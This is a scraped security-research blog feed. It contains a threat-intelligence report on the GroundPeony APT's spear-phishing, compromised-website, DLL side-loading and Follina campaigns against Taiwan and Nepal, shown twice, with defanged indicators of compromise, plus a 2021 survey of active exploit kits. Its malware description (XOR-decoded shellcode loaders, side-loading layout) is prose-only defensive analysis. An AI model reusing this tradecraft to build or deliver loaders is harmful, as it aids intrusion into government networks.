https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/ <a href="#fnref:30" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:31" role="doc-endnote"> ESET, “Worok: The big picture”, https://www.welivesecurity.com/2022/09/06/worok-big-picture/ <a href="#fnref:31" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:32" role="doc-endnote"> Elastic, “Update to the REF2924 intrusion set and related campaigns”, https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns <a href="#fnref:32" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:33" role="doc-endnote"> Symantec, “Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors”, https://symantec-enterprise-blogs.security.com/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor <a href="#fnref:33" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:34" role="doc-endnote"> TrendMicro, “Possible Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad”, https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html <a href="#fnref:34" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:35" role="doc-endnote"> Recorded Future, “RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale”, https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf <a href="#fnref:35" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:36" role="doc-endnote"> Symantec, “Redfly: Espionage Actors Continue to Target Critical Infrastructure”, https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks <a href="#fnref:36" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:37" role="doc-endnote"> Palo Alto Networks, “Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda”, https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ <a href="#fnref:37" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:38" role="doc-endnote"> TrendMicro, “Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks”, https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html <a href="#fnref:38" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:39" role="doc-endnote"> United States Department of Justice, “Seven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally”, https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer <a href="#fnref:39" class="reversefootnote" role="doc-backlink">↩</a> </li> </ol> </div>
GroundPeony: Crawling with Malice

Tue, 22 Aug 2023 03:00:00 -0000

This blog post is based on “GroundPeony: Crawling with Malice” that we presented at HITCON CMT 2023. We are grateful to HITCON for giving us the opportunity to present. https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/ Presentation material (PDF) is here. Abstract In March 2023, we discovered a cyber attack campaign targeting Taiwanese government agencies. The campaign employed devious tactics such as tampering with legitimate websites to distribute malware, using URL obfuscation, and employing multi-stage loaders. In this post, we will first provide an overview of this attack campaign and share the analysis results of the malware used. Through this, the reader will be able to understand the latest attack cases targeting Taiwan. As a result of our investigation, we suspect that this attack campaign was orchestrated by a China-nexus attack group. We will discuss the specific evidence supporting this assumption, and trace back to past attack campaigns. Past campaigns include attacks that exploted the CVE-2022-30190, known as Follina, at the zero-day stage. These studies enable to understand attacker’s motivations and attack backgrounds. This post will enable SOC analysts, IR team members, CSIRT personnel, and others to gain a deep understanding of the latest APT attack trends targeting East and South Asia including Taiwan that have never been reported so far, and to take concrete countermeasures. GroundPeony The name “GroundPeony” was created by us and is not generally known. Based on our reading of the few public reports, we believe they are identical or close to the group dubbed UNC33471 by Mandiant. Active since at least 2021, it targets government organizations in East and South Asia, specifically Taiwan and Nepal. There are two points to note about this group. First, GroudPeony exploits zero-day vulnerability. Specifically, it was the earliest exploiting CVE-2022-30190, also known as Follina. Follina itself is not very complex vulnerability, but it is speculated that this group could develop or have access to a zero-day. This is very interesting. Second, GroundPeony compromised websites for malware distribution. In the past case, Nepal’s government website was compromised. For these reasons, GroundPeony is considered to be an APT group with high attack skill and attack motivation. Timeline This is a quick look at GroundPeony’s attack timeline. The malware has existed on VirusTotal since around 2021. The oldest attack campaign we know is from April to June 2022. Around this time, Follina was exploited to attack Nepal, India, and other countries. After that, we forgot about them for a while, but they started attacking again around March 2023. At this time, they attacked Taiwan and Nepal. In this post, we will deal with the case of April 2022 and March 2023. Latest Attack Flow Let’s look at a specific case. The first is the attack on the Taiwanese government that occurred in March 2023. The attack started from spear-phishing email. The email has a DOC file attached. And, a URL is written in the DOC file, and the ZIP file is downloaded by the URL. The ZIP file contains EXE file and DLL file. And executing them, infects malware. The spear-phishing email looked like this. It is about discussions on maritime issues between Taiwan and the USA. This time, I put a mosaic in the image, but the destination was the Taiwanese government organication. Also, the source is cable TV company in Taiwan. Attached to the email is a DOC file with the file name “Regarding bilateral consultations with the USA”. When open the attached DOC file, it looks like this. It pretends to have an error instead of something like a file name. It says to apply an update to resolve the error. The URL is written for the download of the update. When try to download the update file from this URL, it actually downloads ZIP file containing malware. The URL used at this time is very strange. At first glance, it may look like a legitimate Microsoft website. But, due to the structure of the URL, the original host information is Cuttly. When access this URL, you will access to Cuttly. And it will redirect to ZIP file. At this time, the URL redirected from Cuttly was the website of a Taiwanese educational institution. But, this website was compromised, and a ZIP file containing malware was placed. The ZIP file contains 2 EXE files, one TXT file, and one directory named “$RECYCLE.BIN” that looks like Windows trash box. There are 4 files in the $RECYCLE.BIN directory, all with the DOCX extension. But these are not DOCX files. They are actually malware. By the way, did you notice that the update number written in the DOC file and the ZIP file are different? We don’t know if this was simply a mistake by the attacker or a remnant of another ongoing attack campaign. Malware Analysis Let’s take a look at how malware is executed. First, there are 2 files with the EXE extension included in the ZIP file, 系統安全補丁.exe and Install.exe. But the behavior is the same. When the EXE file is executed, the 4 files placed in $RECYCLE.BIN will be copied to the mic directory under the ProgramData directory. At this time, the names of the 4 files are also changed. The 4 files are renamed to mic.exe, version.dll, mic.doc and mic.ver. And then, mic.exe is executed. mic.exe is a legitimate file with a digital signature. But, it loads version.dll which exists in the same directory. When version.dll is executed by DLL Side-Loading, it loads and decrypts mic.doc. The decryption result is malware we call “micDown” mic.exe Legitimate EXE file with a digital signature version.dll DLL for Side-Loading Shellcode launcher for mic.doc mic.doc Shellcode downloader (micDown) mic.ver Config file for micDown Decoding of version.dll process is in two steps. First version.dll decodes mic.doc and executes it as shellcode. The shellcode further decodes itself and continues execution. The export function of version.dll is very simple. First, it reads mic.doc into the memory area allocated by VirtualAlloc with read, write, and execute permissions. Then, it decodes that data with a custom XOR algorithm that combines sub, xor add instructions. When decoding is complete, the process moves to the memory area where the decoded shellcode is located. The decoded shellcode uses the same custom XOR algorithm as before. The RtlDecompressBuffer is then used to decompress. The shellcode is decoded from the beginning of the file, excluding jump instruction. The decoded code executes the executable with the MZ header removed. It also decodes the data in mic.ver and uses it as a configuration. Finally, it downloads and executes the shellcode from the C&C server, saved in the config. The shellcode is encoded with an algorithm similar to that of a previous file. It differs slightly from the file encoding algorithm in that the order of the add,sub,xor instruction is swapped. The encoded config consists of a 0x40 byte C&C host area and a 0x2 byte port area. The IP address at this time was 103[.]199.17.184. Related File An attack similar to the Taiwanese attack we have previously described was also carried out in Nepal. Although the specific origin of the attack is unknown, a legitimate website was compromised and a ZIP file was installed, as was the case in Taiwan. The legitimate website that was compromised was the Nepalese government’s COVID-19 vaccine-related website. For reference, China is known to have provided vaccines to Nepal as part of its One Belt, One Road partnership2. It is unclear what this has to do with the attacking campaing. In the attack against Nepal, app.onedrivo[.] com was used as the C&C server. The domain was taken using PublicDomainRegistry. More on this domain later. In the attack against Nepal, the malware behaves the same way. When the EXE file is executed, it copies and renames the file and executes mic.exe. mic.exe sideloads version.dll. Then version.dll will read, decode and execute mic.doc. The malware executed was the same as the previous one, called micDown. Related Past Campaign The C&C server used in the previous attack on Nepal has been used in other attacks in the past. The attack on Nepal occurred in April 2022. At that time, this group exploited CVE-2022-30190, also known as Follina. Finally, the CobaltStrike beacon is executed. This domain was used as the server to download this CobaltStrike and as the C&C server. The DOCX file that served as the decoy is a statement of accusation by a person claiming to be a student at Kathmandu University. We do not know the authenticity of this accusation. This DOCX file contains the external link settings. This will load the HTML file. The HTML file contains JavaScript code to change the location. The modified location is written with the scheme ms-msdt. This is the scheme for the Microsoft Support Diagnostic Tool. However,a bug existed in this that allowed PowerShell code to be executed. So, PowerShell code to be executed from a DOCX file. The PowerShell code is downloaded, extracted and executed to a CAB file from the server. Inside the CAB file is an EXE file made by PyInstaller. This EXE is a downloader. And can be downloaded from onedrivo[.]com and run the CobaltStrike beacon. Attribution Let us consider the attribution of this group. To begin with, it is important when this group was exploiting Follina. Follina was finally exploited by a very large number of APT groups. But that was after the details were made public. Here is the timeline. The first time Follina became known to the public was through our tweets. We discovered the Follina sample against Belarus on May 27 and tweeted about it. Since then, detailed explanatory blogs have been published and PoCs have been released. Going back earlier, a vulnerability was reported to Microsoft by the ShadowChasing group on April 12. However, Microsoft did not acknowledge it as a vulnerability at that time. The attack reported is also against Belarus. Let’s go back further. In our research, we found samples from April 7 and 8. These are attacks against Nepal and India. We believe this is the earliest Follina sample. And these are the attacks by the group Mandiant calls UNC3347, which we call GroundPeony. In other words, GroundPeony was exploiting Follina during a perfect zero-day period. Various organizations have written reports about Follina exploits, but China-nexus is the only group that has exploited Follina during zero-day periods. Therefore, we believe GroundPeony is the only China-nexus APT group with zero-day access. Let’s look at another indicator. We analyzed an EXE file made by PyInstaller that is executed after the Follina exploit. The PyInstaller binary can easily decompile the Python code. The extracted file looked like this. A large amount of Chinese comments were written. Also, the code was copy-pasted from various public repositories, but most of it was written by Chinese developer. This is a very elementary mistake. However, it is highly likely that the person who created the malware is a native Chinese speaker. We tried mapping the victim (or presumed to be). A very interesting diagram. What does this mean? Based on our previous research, we have created a diamond model. GroundPeony, also known as UNC3347, is a China-nexus APT group. They have been active since at least 2021. They target East and South Asia like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. The attacks begin with spear phishing emails. They compromised legitimate websites and use them for their attacks. There was nothing unique about the IP addresses used, and no connection to the victim country could be found. GroundPeony also provides zero-day access. Besides popular tools such as CobaltStrike, they also use group’s original malware. Wrap-Up GroundPeony is an APT group of which little is known so far. It is believed to be China-nexus. It is targeting East and South Asian countries like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. One point worth noting is their use of zero-day. Follina was exploited in its early period. This group also compromised legitimate websites and install malware. GroundPeony is an aggressive APT group. Please keep an eye on their future developments. IoC 103[.]199.17.184 160[.]20.145.111 172[.]93.189.239 *.onedrivo[.]com 1992b552bdaf93caeb470f94b4bf91e0157ba4a9bb92fb8430be946c0ddabdeb 425630cc8be2a7dc2626ccd927bb45e5d40c1cb606bb5b2a7e8928df010af7c9 fa6510a84929a0c49d91b3887189fca5a310129912d8e7d14fed062e9446af7e 142a027d78c7ab5b425c2b849b347952196b03618e4ad74452dbe2ed4e3f73cd d1989ca12426ed368816ce00f08975dc1ff1e4f474592523c40f9af344a57b49 6e13e5c7fcbafc47df259f2565efaed51bc1d021010c51673a7c455b5d4dad2b ef611e07e9d7e20ed3d215e4f407a7a7ca9f64308905c37e53df39f8a5bcbb3c 7b814e43af86a84b9ad16d47f9c74da484ea69903ef0fbe40ec62ba123d83a9a f3e0a3dd3d97ccc23c4cee0fd9c247dbe79fbf39bc9ae9152d4676c96e46e483 50182fca4c22c7dde7b8392ceb4c0fef67129f7dc386631e6db39dec73537705 References Mandiant, “Move, Patch, Get Out the Way: 2022 Zero-Day Exploitation Continues at an Elevated Pace”, https://www.mandiant.com/resources/blog/zero-days-exploited-2022 ↩ Ministry of Foreign Affairs of the People’s Republic of China, “Initiative for Belt and Road Partnership on COVID-19 Vaccines Cooperation”, https://www.fmprc.gov.cn/mfa_eng/wjdt_665385/2649_665393/202106/t20210624_9170568.html ↩

<img src="https://nao-sec.org/assets/2023-08-22/top.png" alt="" /> This blog post is based on “GroundPeony: Crawling with Malice” that we presented at HITCON CMT 2023. We are grateful to HITCON for giving us the opportunity to present. <a href="https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/">https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/</a> Presentation material (PDF) is <a href="https://github.com/nao-sec/materials/blob/master/HITCON2023/GroundPeony_Crawling_with_Malice.pdf">here</a>. <h2 id="abstract">Abstract</h2> In March 2023, we discovered a cyber attack campaign targeting Taiwanese government agencies. The campaign employed devious tactics such as tampering with legitimate websites to distribute malware, using URL obfuscation, and employing multi-stage loaders. In this post, we will first provide an overview of this attack campaign and share the analysis results of the malware used. Through this, the reader will be able to understand the latest attack cases targeting Taiwan. As a result of our investigation, we suspect that this attack campaign was orchestrated by a China-nexus attack group. We will discuss the specific evidence supporting this assumption, and trace back to past attack campaigns. Past campaigns include attacks that exploted the CVE-2022-30190, known as Follina, at the zero-day stage. These studies enable to understand attacker’s motivations and attack backgrounds. This post will enable SOC analysts, IR team members, CSIRT personnel, and others to gain a deep understanding of the latest APT attack trends targeting East and South Asia including Taiwan that have never been reported so far, and to take concrete countermeasures. <h2 id="groundpeony">GroundPeony</h2> The name “GroundPeony” was created by us and is not generally known. Based on our reading of the few public reports, we believe they are identical or close to the group dubbed UNC3347<a href="#fn:1" class="footnote" rel="footnote">1</a> by Mandiant. Active since at least 2021, it targets government organizations in East and South Asia, specifically Taiwan and Nepal. There are two points to note about this group. First, GroudPeony exploits zero-day vulnerability. Specifically, it was the earliest exploiting CVE-2022-30190, also known as Follina. Follina itself is not very complex vulnerability, but it is speculated that this group could develop or have access to a zero-day. This is very interesting. Second, GroundPeony compromised websites for malware distribution. In the past case, Nepal’s government website was compromised. For these reasons, GroundPeony is considered to be an APT group with high attack skill and attack motivation. <h2 id="timeline">Timeline</h2> This is a quick look at GroundPeony’s attack timeline. <img src="https://nao-sec.org/assets/2023-08-22/timeline.png" alt="" /> The malware has existed on VirusTotal since around 2021. The oldest attack campaign we know is from April to June 2022. Around this time, Follina was exploited to attack Nepal, India, and other countries. After that, we forgot about them for a while, but they started attacking again around March 2023. At this time, they attacked Taiwan and Nepal. In this post, we will deal with the case of April 2022 and March 2023. <h2 id="latest-attack-flow">Latest Attack Flow</h2> Let’s look at a specific case. The first is the attack on the Taiwanese government that occurred in March 2023. <img src="https://nao-sec.org/assets/2023-08-22/flow.png" alt="" /> The attack started from spear-phishing email. The email has a DOC file attached. And, a URL is written in the DOC file, and the ZIP file is downloaded by the URL. The ZIP file contains EXE file and DLL file. And executing them, infects malware. <img src="https://nao-sec.org/assets/2023-08-22/mail.png" alt="" /> The spear-phishing email looked like this. It is about discussions on maritime issues between Taiwan and the USA. This time, I put a mosaic in the image, but the destination was the Taiwanese government organication. Also, the source is cable TV company in Taiwan. Attached to the email is a DOC file with the file name “Regarding bilateral consultations with the USA”. <img src="https://nao-sec.org/assets/2023-08-22/doc.png" alt="" /> When open the attached DOC file, it looks like this. It pretends to have an error instead of something like a file name. It says to apply an update to resolve the error. The URL is written for the download of the update. When try to download the update file from this URL, it actually downloads ZIP file containing malware. <img src="https://nao-sec.org/assets/2023-08-22/url.png" alt="" /> The URL used at this time is very strange. At first glance, it may look like a legitimate Microsoft website. But, due to the structure of the URL, the original host information is Cuttly. When access this URL, you will access to Cuttly. And it will redirect to ZIP file. At this time, the URL redirected from Cuttly was the website of a Taiwanese educational institution. But, this website was compromised, and a ZIP file containing malware was placed. <img src="https://nao-sec.org/assets/2023-08-22/zip.png" alt="" /> The ZIP file contains 2 EXE files, one TXT file, and one directory named “$RECYCLE.BIN” that looks like Windows trash box. There are 4 files in the $RECYCLE.BIN directory, all with the DOCX extension. But these are not DOCX files. They are actually malware. By the way, did you notice that the update number written in the DOC file and the ZIP file are different? We don’t know if this was simply a mistake by the attacker or a remnant of another ongoing attack campaign. <img src="https://nao-sec.org/assets/2023-08-22/kb.png" alt="" /> <h2 id="malware-analysis">Malware Analysis</h2> Let’s take a look at how malware is executed. First, there are 2 files with the EXE extension included in the ZIP file, 系統安全補丁.exe and Install.exe. But the behavior is the same. When the EXE file is executed, the 4 files placed in $RECYCLE.BIN will be copied to the mic directory under the ProgramData directory. At this time, the names of the 4 files are also changed. The 4 files are renamed to mic.exe, version.dll, mic.doc and mic.ver. And then, mic.exe is executed. mic.exe is a legitimate file with a digital signature. But, it loads version.dll which exists in the same directory. When version.dll is executed by DLL Side-Loading, it loads and decrypts mic.doc. The decryption result is malware we call “micDown” <img src="https://nao-sec.org/assets/2023-08-22/micdown.png" alt="" /> <ol> <li>mic.exe <ul> <li>Legitimate EXE file with a digital signature</li> </ul> </li> <li>version.dll <ul> <li>DLL for Side-Loading</li> <li>Shellcode launcher for mic.doc</li> </ul> </li> <li>mic.doc <ul> <li>Shellcode downloader (micDown)</li> </ul> </li> <li>mic.ver <ul> <li>Config file for micDown</li> </ul> </li> </ol> Decoding of version.dll process is in two steps. First version.dll decodes mic.doc and executes it as shellcode. The shellcode further decodes itself and continues execution. <img src="https://nao-sec.org/assets/2023-08-22/versiondll.png" alt="" /> The export function of version.dll is very simple. First, it reads mic.doc into the memory area allocated by VirtualAlloc with read, write, and execute permissions. Then, it decodes that data with a custom XOR algorithm that combines sub, xor add instructions. When decoding is complete, the process moves to the memory area where the decoded shellcode is located. <img src="https://nao-sec.org/assets/2023-08-22/dll1.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/dll2.png" alt="" /> The decoded shellcode uses the same custom XOR algorithm as before. The RtlDecompressBuffer is then used to decompress. The shellcode is decoded from the beginning of the file, excluding jump instruction. <img src="https://nao-sec.org/assets/2023-08-22/doc1.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/doc2.png" alt="" /> The decoded code executes the executable with the MZ header removed. It also decodes the data in mic.ver and uses it as a configuration. Finally, it downloads and executes the shellcode from the C&C server, saved in the config. <img src="https://nao-sec.org/assets/2023-08-22/payload1.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/payload2.png" alt="" /> The shellcode is encoded with an algorithm similar to that of a previous file. It differs slightly from the file encoding algorithm in that the order of the add,sub,xor instruction is swapped. <img src="https://nao-sec.org/assets/2023-08-22/payload3.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/payload4.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/payload5.png" alt="" /> The encoded config consists of a 0x40 byte C&C host area and a 0x2 byte port area. The IP address at this time was 103[.]199.17.184. <img src="https://nao-sec.org/assets/2023-08-22/ver1.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/ver2.png" alt="" /> <h2 id="related-file">Related File</h2> An attack similar to the Taiwanese attack we have previously described was also carried out in Nepal. Although the specific origin of the attack is unknown, a legitimate website was compromised and a ZIP file was installed, as was the case in Taiwan. The legitimate website that was compromised was the Nepalese government’s COVID-19 vaccine-related website. For reference, China is known to have provided vaccines to Nepal as part of its One Belt, One Road partnership<a href="#fn:2" class="footnote" rel="footnote">2</a>. It is unclear what this has to do with the attacking campaing. In the attack against Nepal, app.onedrivo[.] com was used as the C&C server. The domain was taken using PublicDomainRegistry. More on this domain later. In the attack against Nepal, the malware behaves the same way. When the EXE file is executed, it copies and renames the file and executes mic.exe. mic.exe sideloads version.dll. Then version.dll will read, decode and execute mic.doc. The malware executed was the same as the previous one, called micDown. <img src="https://nao-sec.org/assets/2023-08-22/flow2.png" alt="" /> <h2 id="related-past-campaign">Related Past Campaign</h2> The C&C server used in the previous attack on Nepal has been used in other attacks in the past. The attack on Nepal occurred in April 2022. At that time, this group exploited CVE-2022-30190, also known as Follina. Finally, the CobaltStrike beacon is executed. This domain was used as the server to download this CobaltStrike and as the C&C server. <img src="https://nao-sec.org/assets/2023-08-22/past.png" alt="" /> The DOCX file that served as the decoy is a statement of accusation by a person claiming to be a student at Kathmandu University. We do not know the authenticity of this accusation. <img src="https://nao-sec.org/assets/2023-08-22/decoy.png" alt="" /> This DOCX file contains the external link settings. This will load the HTML file. The HTML file contains JavaScript code to change the location. The modified location is written with the scheme ms-msdt. This is the scheme for the Microsoft Support Diagnostic Tool. However,a bug existed in this that allowed PowerShell code to be executed. So, PowerShell code to be executed from a DOCX file. <img src="https://nao-sec.org/assets/2023-08-22/xml.png" alt="" /> The PowerShell code is downloaded, extracted and executed to a CAB file from the server. <img src="https://nao-sec.org/assets/2023-08-22/ps1.png" alt="" /> Inside the CAB file is an EXE file made by PyInstaller. This EXE is a downloader. And can be downloaded from onedrivo[.]com and run the CobaltStrike beacon. <img src="https://nao-sec.org/assets/2023-08-22/pyi.png" alt="" /> <h2 id="attribution">Attribution</h2> Let us consider the attribution of this group. To begin with, it is important when this group was exploiting Follina. Follina was finally exploited by a very large number of APT groups. But that was after the details were made public. Here is the timeline. <img src="https://nao-sec.org/assets/2023-08-22/follina.png" alt="" /> The first time Follina became known to the public was through our tweets. We discovered the Follina sample against Belarus on May 27 and tweeted about it. Since then, detailed explanatory blogs have been published and PoCs have been released. Going back earlier, a vulnerability was reported to Microsoft by the ShadowChasing group on April 12. However, Microsoft did not acknowledge it as a vulnerability at that time. The attack reported is also against Belarus. Let’s go back further. In our research, we found samples from April 7 and 8. These are attacks against Nepal and India. We believe this is the earliest Follina sample. And these are the attacks by the group Mandiant calls UNC3347, which we call GroundPeony. In other words, GroundPeony was exploiting Follina during a perfect zero-day period. Various organizations have written reports about Follina exploits, but China-nexus is the only group that has exploited Follina during zero-day periods. Therefore, we believe GroundPeony is the only China-nexus APT group with zero-day access. Let’s look at another indicator. We analyzed an EXE file made by PyInstaller that is executed after the Follina exploit. The PyInstaller binary can easily decompile the Python code. The extracted file looked like this. <img src="https://nao-sec.org/assets/2023-08-22/python.png" alt="" /> A large amount of Chinese comments were written. Also, the code was copy-pasted from various public repositories, but most of it was written by Chinese developer. This is a very elementary mistake. However, it is highly likely that the person who created the malware is a native Chinese speaker. We tried mapping the victim (or presumed to be). A very interesting diagram. What does this mean? <img src="https://nao-sec.org/assets/2023-08-22/map.png" alt="" /> Based on our previous research, we have created a diamond model. <img src="https://nao-sec.org/assets/2023-08-22/diamond.png" alt="" /> GroundPeony, also known as UNC3347, is a China-nexus APT group. They have been active since at least 2021. They target East and South Asia like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. The attacks begin with spear phishing emails. They compromised legitimate websites and use them for their attacks. There was nothing unique about the IP addresses used, and no connection to the victim country could be found. GroundPeony also provides zero-day access. Besides popular tools such as CobaltStrike, they also use group’s original malware. <h2 id="wrap-up">Wrap-Up</h2> GroundPeony is an APT group of which little is known so far. It is believed to be China-nexus. It is targeting East and South Asian countries like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. One point worth noting is their use of zero-day. Follina was exploited in its early period. This group also compromised legitimate websites and install malware. GroundPeony is an aggressive APT group. Please keep an eye on their future developments. <h2 id="ioc">IoC</h2> <ul> <li>103[.]199.17.184</li> <li>160[.]20.145.111</li> <li>172[.]93.189.239</li> <li>*.onedrivo[.]com</li> <li>1992b552bdaf93caeb470f94b4bf91e0157ba4a9bb92fb8430be946c0ddabdeb</li> <li>425630cc8be2a7dc2626ccd927bb45e5d40c1cb606bb5b2a7e8928df010af7c9</li> <li>fa6510a84929a0c49d91b3887189fca5a310129912d8e7d14fed062e9446af7e</li> <li>142a027d78c7ab5b425c2b849b347952196b03618e4ad74452dbe2ed4e3f73cd</li> <li>d1989ca12426ed368816ce00f08975dc1ff1e4f474592523c40f9af344a57b49</li> <li>6e13e5c7fcbafc47df259f2565efaed51bc1d021010c51673a7c455b5d4dad2b</li> <li>ef611e07e9d7e20ed3d215e4f407a7a7ca9f64308905c37e53df39f8a5bcbb3c</li> <li>7b814e43af86a84b9ad16d47f9c74da484ea69903ef0fbe40ec62ba123d83a9a</li> <li>f3e0a3dd3d97ccc23c4cee0fd9c247dbe79fbf39bc9ae9152d4676c96e46e483</li> <li>50182fca4c22c7dde7b8392ceb4c0fef67129f7dc386631e6db39dec73537705</li> </ul> <h2 id="references">References</h2> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> Mandiant, “Move, Patch, Get Out the Way: 2022 Zero-Day Exploitation Continues at an Elevated Pace”, https://www.mandiant.com/resources/blog/zero-days-exploited-2022 <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:2" role="doc-endnote"> Ministry of Foreign Affairs of the People’s Republic of China, “Initiative for Belt and Road Partnership on COVID-19 Vaccines Cooperation”, https://www.fmprc.gov.cn/mfa_eng/wjdt_665385/2649_665393/202106/t20210624_9170568.html <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a> </li> </ol> </div>
Exploit Kit still sharpens a sword

Thu, 15 Apr 2021 15:00:00 -0000

Note: This blog post doesn’t make sense to many It’s 2021 now. Moreover, the quarter has already passed. I thought Drive-by Download attack was dead four years ago. Angler Exploit Kit has disappeared, pseudo-Darkleech and EITest campaign have disappeared, and RIG Exploit Kit has also declined. At that time, Drive-by Download attack was definitely supposed to die. However, even if in 2021, it will not disappear fire still slightly. In April 2021, I received some incredible notices. For example, there are the following notifications. PurpleFox Exploit Kit has started exploiting CVE-2021-26411 RIG Exploit Kit has started exploiting CVE-2021-26411 Bottle Exploit Kit is back, and has started exploiting CVE-2020-1380 and CVE-2021-26411 Underminer Exploit Kit is back Repeat again. It’s 2021 now. Not 2017. Internet Explorer was taken away by Chrome and Edge, and Drive-by Download attack was supposed to die. Why are there still Drive-by Download attacks? Here are some reasons, including the opinions of your friends. Internet Explorer is still used in some countries/regions including Japan Due to the influence of corona, remote work has increased, and the number of users with network security vulnerabilities has increased Internet Explorer vulnerabilities still discovered and exploit code published In reality, these are intricately intertwined, and there may be different reasons. In any case, Drive-by Download attacks are still being observed. Moreover, it is a little more active. This is irrelevant for most people. Because most people don’t use Internet Explorer. If you don’t use Internet Explorer, a typical Exploit Kit attack is not a threat. A small number of targeted attacks may use Chrome’s 0day, which is not discussed here. For the few enthusiastic Internet Explorer users that exist, I write this blog post. In other words, as of April 2021, I will introduce the characteristics of common Drive-by Download attacks that you may encounter. Thanks to my friends (@jeromesegura, @nao_sec members) for helping me write this blog post. Exploit Kit Landscape As of April 2021, the following 6 types of Exploit Kits have been observed to be active. RIG Spelevo PurpleFox Underminer Bottle Magnitude nao_sec has been running a fully automatic Drive-by Download attack observation environment called Augma System[1] for three years. The data observed by this is as follows. Some Exploit Kits are not counted because they are observed in different environments. The features of the 6 types of Exploit Kits currently observed are as follows. Private Update Exploit RIG No Yes CVE-2020-0674, CVE-2021-26411 Spelevo No No CVE-2018-8174, CVE-2018-15982 PurpleFox Yes Yes CVE-2021-26411 Underminer Yes No CVE-2018-15982 Bottle Yes Yes CVE-2020-1380, CVE-2021-26411 Magnitude Yes Yes CVE-2021-26411 Here is sample traffic for each. RIG Exploit Kit RIG is an Exploit Kit that has been active since around 2014. It was extremely active from 2016 to 2017, but then declined with the advent of Fallout and others. However, it is still active in 2021. RIG started abusing CVE-2021-26411 in April 2021 and are still incorporating changes. Landing Pages are not obfuscated as they used to be. Very simple code. The malware is RC4 encrypted. Download sample traffic here. Spelevo Exploit Kit Spelevo is an Exploit Kit that appeared in 2019. 2020 was very mature, but 2021 is one of the most active Exploit Kits. Spelevo hasn’t changed for a long time. Spelevo hides the malware in the image. See this article[2] for detailed behavior. Download sample traffic here. PurpleFox Exploit Kit PurpleFox is an Exploit Kit that has been active since 2019. A private exploit kit for sending PurpleFox malware. It’s enthusiastic about exploit and is fairly fast at incorporating new vulnerabilities. Spelevo has started to exploit CVE-2021-26411 in April 2021. However, the other parts have not changed for a long time. Download sample traffic here. Underminer Exploit Kit Underminer is an Exploit Kit that appeared in 2018. It’s a pretty distinctive Exploit Kit. It is known to be extremely difficult to analyze. It is used to deliver its unique malware called Hidden Bee. See this article[3] for more details. Underminer has a cycle of activity for several months and then silence for several months. It has been silent since the November 2020, but was revived in April 2021. But the essence hasn’t changed at all. Download sample traffic here. Bottle Exploit Kit Bottle is an Exploit Kit that appeared in 2019. An extremely rare Exploit Kit that targets only Japan. It is used to deliver its unique malware called Cinobi. It is one of the most active Exploit Kits in Japan. It has not been observed since November 2020, but it was revived in April 2021. It’s also worth noting that unlike other Exploit Kits, it exploits CVE-2020-1380 and CVE-2021-26411. It has been pointed out that it is related to MageCart and phishing campaigns. See this article[4] for more details. Download sample traffic here. Magnitude Exploit Kit Magnitude is one of the oldest existing Exploit Kits. It has been observed only in certain countries/regions such as South Korea and Taiwan, and the details have not been reported much. Its activity was also reported in April 2021. It exploits CVE-2021-26411 and is still actively evolving. One more: #MagnitudeEK pic.twitter.com/pOuIZzAPZG— Jérôme Segura (@jeromesegura) April 14, 2021 Finally Drive-by Download attacks are still observed in 2021. It has nothing to do with most people. As with Adobe Flash Player, stop using Internet Explorer immediately. That is the simplest solution. Drive-by Download attacks continue to exist with Internet Explorer. References [1] https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf [2] https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit [3] https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/ [4] http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf

